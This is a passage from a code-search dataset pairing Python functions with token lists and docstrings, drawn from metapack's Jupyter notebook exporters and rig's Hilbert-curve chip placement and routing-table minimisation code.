"get_package_dir_name",
"(",
"nb",
")",
"return",
"join",
"(",
"self",
".",
"package_dir",
",",
"self",
".",
"package_name",
")"
] | Open a notebook and determine the output directory from the name | [
"Open",
"a",
"notebook",
"and",
"determine",
"the",
"output",
"directory",
"from",
"the",
"name"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L273-L277 |
Metatab/metapack | metapack/jupyter/exporters.py | NotebookExecutor.extract_terms | def extract_terms(self, nb):
"""Extract some term values, usually set with tags or metadata"""
emt = ExtractMetatabTerms()
emt.preprocess(nb, {})
return emt.terms | python | def extract_terms(self, nb):
"""Extract some term values, usually set with tags or metadata"""
emt = ExtractMetatabTerms()
emt.preprocess(nb, {})
return emt.terms | [
"def",
"extract_terms",
"(",
"self",
",",
"nb",
")",
":",
"emt",
"=",
"ExtractMetatabTerms",
"(",
")",
"emt",
".",
"preprocess",
"(",
"nb",
",",
"{",
"}",
")",
"return",
"emt",
".",
"terms"
] | Extract some term values, usually set with tags or metadata | [
"Extract",
"some",
"term",
"values",
"usually",
"set",
"with",
"tags",
"or",
"metadata"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L279-L284 |
Metatab/metapack | metapack/jupyter/exporters.py | NotebookExecutor.from_notebook_node | def from_notebook_node(self, nb, resources=None, **kw):
"""Create a Metatab package from a notebook node """
nb_copy = copy.deepcopy(nb)
# The the package name and directory, either from the inlined Metatab doc,
# or from the config
try:
self.output_dir = self.get_output_dir(nb)
except NotebookError as e:
# Notebook probably lacks a metatab doc.
self.log.fatal(e)
sys.exit(1)
assert self.output_dir
resources = self._init_resources(resources)
resources['outputs'] = {}
if 'language' in nb['metadata']:
resources['language'] = nb['metadata']['language'].lower()
# Do any other configured preprocessing
nb_copy, resources = self._preprocess(nb_copy, resources)
# The Notebook can set some terms with tags
self.extra_terms = self.extract_terms(nb_copy)
# Clear the output before executing
self.clear_output(nb_copy)
nb_copy, resources = self.exec_notebook(nb_copy, resources, self.notebook_dir)
eld = ExtractLibDirs()
eld.preprocess(nb_copy, {})
self.lib_dirs = eld.lib_dirs
efm = ExtractFinalMetatabDoc()
efm.preprocess(nb_copy, {})
if not efm.doc:
raise MetapackError("No metatab doc")
self.doc = efm.doc
for section, term, value in self.extra_terms:
self.doc[section].get_or_new_term(term, value)
nb, _ = RemoveMetatab().preprocess(nb, {})
resources['outputs']['notebooks/{}.ipynb'.format(self.package_name)] = nbformat.writes(nb).encode('utf-8')
return efm.doc.as_csv(), resources | python | def from_notebook_node(self, nb, resources=None, **kw):
"""Create a Metatab package from a notebook node """
nb_copy = copy.deepcopy(nb)
# The the package name and directory, either from the inlined Metatab doc,
# or from the config
try:
self.output_dir = self.get_output_dir(nb)
except NotebookError as e:
# Notebook probably lacks a metatab doc.
self.log.fatal(e)
sys.exit(1)
assert self.output_dir
resources = self._init_resources(resources)
resources['outputs'] = {}
if 'language' in nb['metadata']:
resources['language'] = nb['metadata']['language'].lower()
# Do any other configured preprocessing
nb_copy, resources = self._preprocess(nb_copy, resources)
# The Notebook can set some terms with tags
self.extra_terms = self.extract_terms(nb_copy)
# Clear the output before executing
self.clear_output(nb_copy)
nb_copy, resources = self.exec_notebook(nb_copy, resources, self.notebook_dir)
eld = ExtractLibDirs()
eld.preprocess(nb_copy, {})
self.lib_dirs = eld.lib_dirs
efm = ExtractFinalMetatabDoc()
efm.preprocess(nb_copy, {})
if not efm.doc:
raise MetapackError("No metatab doc")
self.doc = efm.doc
for section, term, value in self.extra_terms:
self.doc[section].get_or_new_term(term, value)
nb, _ = RemoveMetatab().preprocess(nb, {})
resources['outputs']['notebooks/{}.ipynb'.format(self.package_name)] = nbformat.writes(nb).encode('utf-8')
return efm.doc.as_csv(), resources | [
"def",
"from_notebook_node",
"(",
"self",
",",
"nb",
",",
"resources",
"=",
"None",
",",
"*",
"*",
"kw",
")",
":",
"nb_copy",
"=",
"copy",
".",
"deepcopy",
"(",
"nb",
")",
"# The the package name and directory, either from the inlined Metatab doc,",
"# or from the config",
"try",
":",
"self",
".",
"output_dir",
"=",
"self",
".",
"get_output_dir",
"(",
"nb",
")",
"except",
"NotebookError",
"as",
"e",
":",
"# Notebook probably lacks a metatab doc.",
"self",
".",
"log",
".",
"fatal",
"(",
"e",
")",
"sys",
".",
"exit",
"(",
"1",
")",
"assert",
"self",
".",
"output_dir",
"resources",
"=",
"self",
".",
"_init_resources",
"(",
"resources",
")",
"resources",
"[",
"'outputs'",
"]",
"=",
"{",
"}",
"if",
"'language'",
"in",
"nb",
"[",
"'metadata'",
"]",
":",
"resources",
"[",
"'language'",
"]",
"=",
"nb",
"[",
"'metadata'",
"]",
"[",
"'language'",
"]",
".",
"lower",
"(",
")",
"# Do any other configured preprocessing",
"nb_copy",
",",
"resources",
"=",
"self",
".",
"_preprocess",
"(",
"nb_copy",
",",
"resources",
")",
"# The Notebook can set some terms with tags",
"self",
".",
"extra_terms",
"=",
"self",
".",
"extract_terms",
"(",
"nb_copy",
")",
"# Clear the output before executing",
"self",
".",
"clear_output",
"(",
"nb_copy",
")",
"nb_copy",
",",
"resources",
"=",
"self",
".",
"exec_notebook",
"(",
"nb_copy",
",",
"resources",
",",
"self",
".",
"notebook_dir",
")",
"eld",
"=",
"ExtractLibDirs",
"(",
")",
"eld",
".",
"preprocess",
"(",
"nb_copy",
",",
"{",
"}",
")",
"self",
".",
"lib_dirs",
"=",
"eld",
".",
"lib_dirs",
"efm",
"=",
"ExtractFinalMetatabDoc",
"(",
")",
"efm",
".",
"preprocess",
"(",
"nb_copy",
",",
"{",
"}",
")",
"if",
"not",
"efm",
".",
"doc",
":",
"raise",
"MetapackError",
"(",
"\"No metatab doc\"",
")",
"self",
".",
"doc",
"=",
"efm",
".",
"doc",
"for",
"section",
",",
"term",
",",
"value",
"in",
"self",
".",
"extra_terms",
":",
"self",
".",
"doc",
"[",
"section",
"]",
".",
"get_or_new_term",
"(",
"term",
",",
"value",
")",
"nb",
",",
"_",
"=",
"RemoveMetatab",
"(",
")",
".",
"preprocess",
"(",
"nb",
",",
"{",
"}",
")",
"resources",
"[",
"'outputs'",
"]",
"[",
"'notebooks/{}.ipynb'",
".",
"format",
"(",
"self",
".",
"package_name",
")",
"]",
"=",
"nbformat",
".",
"writes",
"(",
"nb",
")",
".",
"encode",
"(",
"'utf-8'",
")",
"return",
"efm",
".",
"doc",
".",
"as_csv",
"(",
")",
",",
"resources"
] | Create a Metatab package from a notebook node | [
"Create",
"a",
"Metatab",
"package",
"from",
"a",
"notebook",
"node"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L292-L347 |
Metatab/metapack | metapack/jupyter/exporters.py | HugoOutputExtractor.preprocess_cell | def preprocess_cell(self, cell, resources, cell_index):
"""Also extracts attachments"""
from nbformat.notebooknode import NotebookNode
attach_names = []
# Just move the attachment into an output
for k, attach in cell.get('attachments', {}).items():
for mime_type in self.extract_output_types:
if mime_type in attach:
if not 'outputs' in cell:
cell['outputs'] = []
o = NotebookNode({
'data': NotebookNode({mime_type: attach[mime_type]}),
'metadata': NotebookNode({
'filenames': {mime_type: k} # Will get re-written
}),
'output_type': 'display_data'
})
cell['outputs'].append(o)
attach_names.append((mime_type, k))
nb, resources = super().preprocess_cell(cell, resources, cell_index)
output_names = list(resources.get('outputs', {}).keys())
if attach_names:
# We're going to assume that attachments are only on Markdown cells, and Markdown cells
# can't generate output, so all of the outputs wee added.
# reverse + zip matches the last len(attach_names) elements from output_names
for output_name, (mimetype, an) in zip(reversed(output_names), reversed(attach_names)):
# We'll post process to set the final output directory
cell.source = re.sub('\(attachment:{}\)'.format(an),
'(__IMGDIR__/{})'.format(output_name), cell.source)
return nb, resources | python | def preprocess_cell(self, cell, resources, cell_index):
"""Also extracts attachments"""
from nbformat.notebooknode import NotebookNode
attach_names = []
# Just move the attachment into an output
for k, attach in cell.get('attachments', {}).items():
for mime_type in self.extract_output_types:
if mime_type in attach:
if not 'outputs' in cell:
cell['outputs'] = []
o = NotebookNode({
'data': NotebookNode({mime_type: attach[mime_type]}),
'metadata': NotebookNode({
'filenames': {mime_type: k} # Will get re-written
}),
'output_type': 'display_data'
})
cell['outputs'].append(o)
attach_names.append((mime_type, k))
nb, resources = super().preprocess_cell(cell, resources, cell_index)
output_names = list(resources.get('outputs', {}).keys())
if attach_names:
# We're going to assume that attachments are only on Markdown cells, and Markdown cells
# can't generate output, so all of the outputs wee added.
# reverse + zip matches the last len(attach_names) elements from output_names
for output_name, (mimetype, an) in zip(reversed(output_names), reversed(attach_names)):
# We'll post process to set the final output directory
cell.source = re.sub('\(attachment:{}\)'.format(an),
'(__IMGDIR__/{})'.format(output_name), cell.source)
return nb, resources | [
"def",
"preprocess_cell",
"(",
"self",
",",
"cell",
",",
"resources",
",",
"cell_index",
")",
":",
"from",
"nbformat",
".",
"notebooknode",
"import",
"NotebookNode",
"attach_names",
"=",
"[",
"]",
"# Just move the attachment into an output",
"for",
"k",
",",
"attach",
"in",
"cell",
".",
"get",
"(",
"'attachments'",
",",
"{",
"}",
")",
".",
"items",
"(",
")",
":",
"for",
"mime_type",
"in",
"self",
".",
"extract_output_types",
":",
"if",
"mime_type",
"in",
"attach",
":",
"if",
"not",
"'outputs'",
"in",
"cell",
":",
"cell",
"[",
"'outputs'",
"]",
"=",
"[",
"]",
"o",
"=",
"NotebookNode",
"(",
"{",
"'data'",
":",
"NotebookNode",
"(",
"{",
"mime_type",
":",
"attach",
"[",
"mime_type",
"]",
"}",
")",
",",
"'metadata'",
":",
"NotebookNode",
"(",
"{",
"'filenames'",
":",
"{",
"mime_type",
":",
"k",
"}",
"# Will get re-written",
"}",
")",
",",
"'output_type'",
":",
"'display_data'",
"}",
")",
"cell",
"[",
"'outputs'",
"]",
".",
"append",
"(",
"o",
")",
"attach_names",
".",
"append",
"(",
"(",
"mime_type",
",",
"k",
")",
")",
"nb",
",",
"resources",
"=",
"super",
"(",
")",
".",
"preprocess_cell",
"(",
"cell",
",",
"resources",
",",
"cell_index",
")",
"output_names",
"=",
"list",
"(",
"resources",
".",
"get",
"(",
"'outputs'",
",",
"{",
"}",
")",
".",
"keys",
"(",
")",
")",
"if",
"attach_names",
":",
"# We're going to assume that attachments are only on Markdown cells, and Markdown cells",
"# can't generate output, so all of the outputs wee added.",
"# reverse + zip matches the last len(attach_names) elements from output_names",
"for",
"output_name",
",",
"(",
"mimetype",
",",
"an",
")",
"in",
"zip",
"(",
"reversed",
"(",
"output_names",
")",
",",
"reversed",
"(",
"attach_names",
")",
")",
":",
"# We'll post process to set the final output directory",
"cell",
".",
"source",
"=",
"re",
".",
"sub",
"(",
"'\\(attachment:{}\\)'",
".",
"format",
"(",
"an",
")",
",",
"'(__IMGDIR__/{})'",
".",
"format",
"(",
"output_name",
")",
",",
"cell",
".",
"source",
")",
"return",
"nb",
",",
"resources"
] | Also extracts attachments | [
"Also",
"extracts",
"attachments"
] | train | https://github.com/Metatab/metapack/blob/8365f221fbeaa3c0be9091f2eaf3447fd8e2e8d6/metapack/jupyter/exporters.py#L385-L427 |
project-rig/rig | rig/place_and_route/place/hilbert.py | hilbert | def hilbert(level, angle=1, s=None):
"""Generator of points along a 2D Hilbert curve.
This implements the L-system as described on
`http://en.wikipedia.org/wiki/Hilbert_curve`.
Parameters
----------
level : int
Number of levels of recursion to use in generating the curve. The
resulting curve will be `(2**level)-1` wide/tall.
angle : int
**For internal use only.** `1` if this is the 'positive' expansion of
the grammar and `-1` for the 'negative' expansion.
s : HilbertState
**For internal use only.** The current state of the system.
"""
# An internal (mutable) state object (note: used in place of a closure with
# nonlocal variables for Python 2 support).
class HilbertState(object):
def __init__(self, x=0, y=0, dx=1, dy=0):
self.x, self.y, self.dx, self.dy = x, y, dx, dy
# Create state object first time we're called while also yielding first
# position
if s is None:
s = HilbertState()
yield s.x, s.y
if level <= 0:
return
# Turn left
s.dx, s.dy = s.dy*-angle, s.dx*angle
# Recurse negative
for s.x, s.y in hilbert(level - 1, -angle, s):
yield s.x, s.y
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Turn right
s.dx, s.dy = s.dy*angle, s.dx*-angle
# Recurse positive
for s.x, s.y in hilbert(level - 1, angle, s):
yield s.x, s.y
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Recurse positive
for s.x, s.y in hilbert(level - 1, angle, s):
yield s.x, s.y
# Turn right
s.dx, s.dy = s.dy*angle, s.dx*-angle
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Recurse negative
for s.x, s.y in hilbert(level - 1, -angle, s):
yield s.x, s.y
# Turn left
s.dx, s.dy = s.dy*-angle, s.dx*angle | python | def hilbert(level, angle=1, s=None):
"""Generator of points along a 2D Hilbert curve.
This implements the L-system as described on
`http://en.wikipedia.org/wiki/Hilbert_curve`.
Parameters
----------
level : int
Number of levels of recursion to use in generating the curve. The
resulting curve will be `(2**level)-1` wide/tall.
angle : int
**For internal use only.** `1` if this is the 'positive' expansion of
the grammar and `-1` for the 'negative' expansion.
s : HilbertState
**For internal use only.** The current state of the system.
"""
# An internal (mutable) state object (note: used in place of a closure with
# nonlocal variables for Python 2 support).
class HilbertState(object):
def __init__(self, x=0, y=0, dx=1, dy=0):
self.x, self.y, self.dx, self.dy = x, y, dx, dy
# Create state object first time we're called while also yielding first
# position
if s is None:
s = HilbertState()
yield s.x, s.y
if level <= 0:
return
# Turn left
s.dx, s.dy = s.dy*-angle, s.dx*angle
# Recurse negative
for s.x, s.y in hilbert(level - 1, -angle, s):
yield s.x, s.y
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Turn right
s.dx, s.dy = s.dy*angle, s.dx*-angle
# Recurse positive
for s.x, s.y in hilbert(level - 1, angle, s):
yield s.x, s.y
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Recurse positive
for s.x, s.y in hilbert(level - 1, angle, s):
yield s.x, s.y
# Turn right
s.dx, s.dy = s.dy*angle, s.dx*-angle
# Move forward
s.x, s.y = s.x + s.dx, s.y + s.dy
yield s.x, s.y
# Recurse negative
for s.x, s.y in hilbert(level - 1, -angle, s):
yield s.x, s.y
# Turn left
s.dx, s.dy = s.dy*-angle, s.dx*angle | [
"def",
"hilbert",
"(",
"level",
",",
"angle",
"=",
"1",
",",
"s",
"=",
"None",
")",
":",
"# An internal (mutable) state object (note: used in place of a closure with",
"# nonlocal variables for Python 2 support).",
"class",
"HilbertState",
"(",
"object",
")",
":",
"def",
"__init__",
"(",
"self",
",",
"x",
"=",
"0",
",",
"y",
"=",
"0",
",",
"dx",
"=",
"1",
",",
"dy",
"=",
"0",
")",
":",
"self",
".",
"x",
",",
"self",
".",
"y",
",",
"self",
".",
"dx",
",",
"self",
".",
"dy",
"=",
"x",
",",
"y",
",",
"dx",
",",
"dy",
"# Create state object first time we're called while also yielding first",
"# position",
"if",
"s",
"is",
"None",
":",
"s",
"=",
"HilbertState",
"(",
")",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"if",
"level",
"<=",
"0",
":",
"return",
"# Turn left",
"s",
".",
"dx",
",",
"s",
".",
"dy",
"=",
"s",
".",
"dy",
"*",
"-",
"angle",
",",
"s",
".",
"dx",
"*",
"angle",
"# Recurse negative",
"for",
"s",
".",
"x",
",",
"s",
".",
"y",
"in",
"hilbert",
"(",
"level",
"-",
"1",
",",
"-",
"angle",
",",
"s",
")",
":",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Move forward",
"s",
".",
"x",
",",
"s",
".",
"y",
"=",
"s",
".",
"x",
"+",
"s",
".",
"dx",
",",
"s",
".",
"y",
"+",
"s",
".",
"dy",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Turn right",
"s",
".",
"dx",
",",
"s",
".",
"dy",
"=",
"s",
".",
"dy",
"*",
"angle",
",",
"s",
".",
"dx",
"*",
"-",
"angle",
"# Recurse positive",
"for",
"s",
".",
"x",
",",
"s",
".",
"y",
"in",
"hilbert",
"(",
"level",
"-",
"1",
",",
"angle",
",",
"s",
")",
":",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Move forward",
"s",
".",
"x",
",",
"s",
".",
"y",
"=",
"s",
".",
"x",
"+",
"s",
".",
"dx",
",",
"s",
".",
"y",
"+",
"s",
".",
"dy",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Recurse positive",
"for",
"s",
".",
"x",
",",
"s",
".",
"y",
"in",
"hilbert",
"(",
"level",
"-",
"1",
",",
"angle",
",",
"s",
")",
":",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Turn right",
"s",
".",
"dx",
",",
"s",
".",
"dy",
"=",
"s",
".",
"dy",
"*",
"angle",
",",
"s",
".",
"dx",
"*",
"-",
"angle",
"# Move forward",
"s",
".",
"x",
",",
"s",
".",
"y",
"=",
"s",
".",
"x",
"+",
"s",
".",
"dx",
",",
"s",
".",
"y",
"+",
"s",
".",
"dy",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Recurse negative",
"for",
"s",
".",
"x",
",",
"s",
".",
"y",
"in",
"hilbert",
"(",
"level",
"-",
"1",
",",
"-",
"angle",
",",
"s",
")",
":",
"yield",
"s",
".",
"x",
",",
"s",
".",
"y",
"# Turn left",
"s",
".",
"dx",
",",
"s",
".",
"dy",
"=",
"s",
".",
"dy",
"*",
"-",
"angle",
",",
"s",
".",
"dx",
"*",
"angle"
] | Generator of points along a 2D Hilbert curve.
This implements the L-system as described on
`http://en.wikipedia.org/wiki/Hilbert_curve`.
Parameters
----------
level : int
Number of levels of recursion to use in generating the curve. The
resulting curve will be `(2**level)-1` wide/tall.
angle : int
**For internal use only.** `1` if this is the 'positive' expansion of
the grammar and `-1` for the 'negative' expansion.
s : HilbertState
**For internal use only.** The current state of the system. | [
"Generator",
"of",
"points",
"along",
"a",
"2D",
"Hilbert",
"curve",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/place/hilbert.py#L10-L80 |
project-rig/rig | rig/place_and_route/place/hilbert.py | hilbert_chip_order | def hilbert_chip_order(machine):
"""A generator which iterates over a set of chips in a machine in a hilbert
path.
For use as a chip ordering for the sequential placer.
"""
max_dimen = max(machine.width, machine.height)
hilbert_levels = int(ceil(log(max_dimen, 2.0))) if max_dimen >= 1 else 0
return hilbert(hilbert_levels) | python | def hilbert_chip_order(machine):
"""A generator which iterates over a set of chips in a machine in a hilbert
path.
For use as a chip ordering for the sequential placer.
"""
max_dimen = max(machine.width, machine.height)
hilbert_levels = int(ceil(log(max_dimen, 2.0))) if max_dimen >= 1 else 0
return hilbert(hilbert_levels) | [
"def",
"hilbert_chip_order",
"(",
"machine",
")",
":",
"max_dimen",
"=",
"max",
"(",
"machine",
".",
"width",
",",
"machine",
".",
"height",
")",
"hilbert_levels",
"=",
"int",
"(",
"ceil",
"(",
"log",
"(",
"max_dimen",
",",
"2.0",
")",
")",
")",
"if",
"max_dimen",
">=",
"1",
"else",
"0",
"return",
"hilbert",
"(",
"hilbert_levels",
")"
] | A generator which iterates over a set of chips in a machine in a hilbert
path.
For use as a chip ordering for the sequential placer. | [
"A",
"generator",
"which",
"iterates",
"over",
"a",
"set",
"of",
"chips",
"in",
"a",
"machine",
"in",
"a",
"hilbert",
"path",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/place/hilbert.py#L83-L91 |
project-rig/rig | rig/place_and_route/place/hilbert.py | place | def place(vertices_resources, nets, machine, constraints, breadth_first=True):
"""Places vertices in breadth-first order along a hilbert-curve path
through the chips in the machine.
This is a thin wrapper around the :py:func:`sequential
<rig.place_and_route.place.sequential.place>` placement algorithm which
optionally uses the :py:func:`breadth_first_vertex_order` vertex ordering
(if the breadth_first argument is True, the default) and
:py:func:`hilbert_chip_order` for chip ordering.
Parameters
----------
breadth_first : bool
Should vertices be placed in breadth first order rather than the
iteration order of vertices_resources. True by default.
"""
return sequential_place(vertices_resources, nets,
machine, constraints,
(None if not breadth_first else
breadth_first_vertex_order(vertices_resources,
nets)),
hilbert_chip_order(machine)) | python | def place(vertices_resources, nets, machine, constraints, breadth_first=True):
"""Places vertices in breadth-first order along a hilbert-curve path
through the chips in the machine.
This is a thin wrapper around the :py:func:`sequential
<rig.place_and_route.place.sequential.place>` placement algorithm which
optionally uses the :py:func:`breadth_first_vertex_order` vertex ordering
(if the breadth_first argument is True, the default) and
:py:func:`hilbert_chip_order` for chip ordering.
Parameters
----------
breadth_first : bool
Should vertices be placed in breadth first order rather than the
iteration order of vertices_resources. True by default.
"""
return sequential_place(vertices_resources, nets,
machine, constraints,
(None if not breadth_first else
breadth_first_vertex_order(vertices_resources,
nets)),
hilbert_chip_order(machine)) | [
"def",
"place",
"(",
"vertices_resources",
",",
"nets",
",",
"machine",
",",
"constraints",
",",
"breadth_first",
"=",
"True",
")",
":",
"return",
"sequential_place",
"(",
"vertices_resources",
",",
"nets",
",",
"machine",
",",
"constraints",
",",
"(",
"None",
"if",
"not",
"breadth_first",
"else",
"breadth_first_vertex_order",
"(",
"vertices_resources",
",",
"nets",
")",
")",
",",
"hilbert_chip_order",
"(",
"machine",
")",
")"
] | Places vertices in breadth-first order along a hilbert-curve path
through the chips in the machine.
This is a thin wrapper around the :py:func:`sequential
<rig.place_and_route.place.sequential.place>` placement algorithm which
optionally uses the :py:func:`breadth_first_vertex_order` vertex ordering
(if the breadth_first argument is True, the default) and
:py:func:`hilbert_chip_order` for chip ordering.
Parameters
----------
breadth_first : bool
Should vertices be placed in breadth first order rather than the
iteration order of vertices_resources. True by default. | [
"Places",
"vertices",
"in",
"breadth",
"-",
"first",
"order",
"along",
"a",
"hilbert",
"-",
"curve",
"path",
"through",
"the",
"chips",
"in",
"the",
"machine",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/place/hilbert.py#L94-L115 |
project-rig/rig | rig/routing_table/minimise.py | minimise_tables | def minimise_tables(routing_tables, target_lengths,
methods=(remove_default_entries, ordered_covering)):
"""Utility function which attempts to minimises routing tables for multiple
chips.
For each routing table supplied, this function will attempt to use the
minimisation algorithms given (or some sensible default algorithms), trying
each sequentially until a target number of routing entries has been
reached.
Parameters
----------
routing_tables : {(x, y): [\
:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Dictionary mapping chip co-ordinates to the routing tables associated
with that chip. NOTE: This is the data structure as returned by
:py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_lengths : int or {(x, y): int or None, ...} or None
Maximum length of routing tables. If an integer this is assumed to be
the maximum length for any table; if a dictionary then it is assumed to
be a mapping from co-ordinate to maximum length (or None); if None then
tables will be minimised as far as possible.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:`rig.routing_table.remove_default_routes.minimise`) and then
fall back on the ordered covering algorithm
(:py:meth:`rig.routing_table.ordered_covering.minimise`).
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Minimised routing tables, guaranteed to be at least as small as the
table sizes specified by `target_lengths`.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise a table.
"""
# Coerce the target lengths into the correct forms
if not isinstance(target_lengths, dict):
lengths = collections.defaultdict(lambda: target_lengths)
else:
lengths = target_lengths
# Minimise the routing tables
new_tables = dict()
for chip, table in iteritems(routing_tables):
# Try to minimise the table
try:
new_table = minimise_table(table, lengths[chip], methods)
except MinimisationFailedError as exc:
exc.chip = chip
raise
# Store the table if it isn't empty
if new_table:
new_tables[chip] = new_table
return new_tables | python | def minimise_tables(routing_tables, target_lengths,
methods=(remove_default_entries, ordered_covering)):
"""Utility function which attempts to minimises routing tables for multiple
chips.
For each routing table supplied, this function will attempt to use the
minimisation algorithms given (or some sensible default algorithms), trying
each sequentially until a target number of routing entries has been
reached.
Parameters
----------
routing_tables : {(x, y): [\
:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Dictionary mapping chip co-ordinates to the routing tables associated
with that chip. NOTE: This is the data structure as returned by
:py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_lengths : int or {(x, y): int or None, ...} or None
Maximum length of routing tables. If an integer this is assumed to be
the maximum length for any table; if a dictionary then it is assumed to
be a mapping from co-ordinate to maximum length (or None); if None then
tables will be minimised as far as possible.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:`rig.routing_table.remove_default_routes.minimise`) and then
fall back on the ordered covering algorithm
(:py:meth:`rig.routing_table.ordered_covering.minimise`).
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Minimised routing tables, guaranteed to be at least as small as the
table sizes specified by `target_lengths`.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise a table.
"""
# Coerce the target lengths into the correct forms
if not isinstance(target_lengths, dict):
lengths = collections.defaultdict(lambda: target_lengths)
else:
lengths = target_lengths
# Minimise the routing tables
new_tables = dict()
for chip, table in iteritems(routing_tables):
# Try to minimise the table
try:
new_table = minimise_table(table, lengths[chip], methods)
except MinimisationFailedError as exc:
exc.chip = chip
raise
# Store the table if it isn't empty
if new_table:
new_tables[chip] = new_table
return new_tables | [
"def",
"minimise_tables",
"(",
"routing_tables",
",",
"target_lengths",
",",
"methods",
"=",
"(",
"remove_default_entries",
",",
"ordered_covering",
")",
")",
":",
"# Coerce the target lengths into the correct forms",
"if",
"not",
"isinstance",
"(",
"target_lengths",
",",
"dict",
")",
":",
"lengths",
"=",
"collections",
".",
"defaultdict",
"(",
"lambda",
":",
"target_lengths",
")",
"else",
":",
"lengths",
"=",
"target_lengths",
"# Minimise the routing tables",
"new_tables",
"=",
"dict",
"(",
")",
"for",
"chip",
",",
"table",
"in",
"iteritems",
"(",
"routing_tables",
")",
":",
"# Try to minimise the table",
"try",
":",
"new_table",
"=",
"minimise_table",
"(",
"table",
",",
"lengths",
"[",
"chip",
"]",
",",
"methods",
")",
"except",
"MinimisationFailedError",
"as",
"exc",
":",
"exc",
".",
"chip",
"=",
"chip",
"raise",
"# Store the table if it isn't empty",
"if",
"new_table",
":",
"new_tables",
"[",
"chip",
"]",
"=",
"new_table",
"return",
"new_tables"
] | Utility function which attempts to minimises routing tables for multiple
chips.
For each routing table supplied, this function will attempt to use the
minimisation algorithms given (or some sensible default algorithms), trying
each sequentially until a target number of routing entries has been
reached.
Parameters
----------
routing_tables : {(x, y): [\
:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Dictionary mapping chip co-ordinates to the routing tables associated
with that chip. NOTE: This is the data structure as returned by
:py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_lengths : int or {(x, y): int or None, ...} or None
Maximum length of routing tables. If an integer this is assumed to be
the maximum length for any table; if a dictionary then it is assumed to
be a mapping from co-ordinate to maximum length (or None); if None then
tables will be minimised as far as possible.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:`rig.routing_table.remove_default_routes.minimise`) and then
fall back on the ordered covering algorithm
(:py:meth:`rig.routing_table.ordered_covering.minimise`).
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...], ...}
Minimised routing tables, guaranteed to be at least as small as the
table sizes specified by `target_lengths`.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise a table. | [
"Utility",
"function",
"which",
"attempts",
"to",
"minimises",
"routing",
"tables",
"for",
"multiple",
"chips",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/routing_table/minimise.py#L9-L71 |
project-rig/rig | rig/routing_table/minimise.py | minimise_table | def minimise_table(table, target_length,
methods=(remove_default_entries, ordered_covering)):
"""Apply different minimisation algorithms to minimise a single routing
table.
Parameters
----------
table : [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Routing table to minimise. NOTE: This is the data structure as
returned by :py:meth:`~rig.routing_table.routing_tree_to_tables`.
target_length : int or None
Maximum length of the routing table. If None then all methods will be
tried and the smallest achieved table will be returned.
methods :
Each method is tried in the order presented and the first to meet the
required target length for a given chip is used. Consequently less
computationally costly algorithms should be nearer the start of the
list. The defaults will try to remove default routes
(:py:meth:rig.routing_table.remove_default_routes.minimise) and then
fall back on the ordered covering algorithm
(:py:meth:rig.routing_table.ordered_covering.minimise).
Returns
-------
[:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
Minimised routing table, guaranteed to be at least as small as
`target_length`, or as small as possible if `target_length` is None.
Raises
------
MinimisationFailedError
If no method can sufficiently minimise the table.
"""
# Add a final method which checks the size of the table and returns it if
# the size is correct. NOTE: This method will avoid running any other
# minimisers if the table is already sufficiently small.
methods = list(methods)
methods.insert(0, _identity)
if target_length is not None:
best_achieved = len(table)
# Try each minimiser in turn until the table is small enough
for f in methods:
try:
# Minimise the table, if this fails a MinimisationFailedError
# will be raised and the return will not be executed.
new_table = f(table, target_length)
return new_table
except MinimisationFailedError as exc:
# Store the best achieved final length
if best_achieved is None or exc.final_length < best_achieved:
best_achieved = exc.final_length
# The table must still be too large
raise MinimisationFailedError(target_length, best_achieved)
else:
# Try all methods and return the smallest table
